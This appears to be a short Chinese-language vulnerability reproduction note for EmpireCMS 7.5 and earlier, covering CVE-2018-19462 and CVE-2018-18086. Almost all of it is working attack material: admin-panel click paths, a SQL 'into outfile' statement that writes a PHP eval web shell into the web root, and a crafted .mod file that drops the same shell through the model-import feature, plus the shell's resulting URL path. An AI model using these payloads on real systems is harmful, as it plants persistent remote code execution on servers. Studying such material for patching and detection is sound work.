帝国CMS
1.漏洞复现
cve_2018_19462
影响范围:EmpireCMS <= 7.5
登录后台,路径:/e/admin/index.php
系统->备份与恢复数据->执行SQL语句
mysql.ini配置secure_file_priv=时可以写入PHP一句话木马
select '<?php @eval($_POST[1]);?>' into outfile 'D:/environment/phpstudy/PHPTutorial/WWW/shell.php';
cve_2018_18086 文件上传
影响范围:EmpireCMS <= 7.5
新建shell.php.mod
<?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>
登录后台,路径:/e/admin/index.php
系统->数据表与系统模型->管理数据表->导入系统模型->表名随意、文件选择shell.php.mod
PHP一句话木马路径:/e/admin/shell.php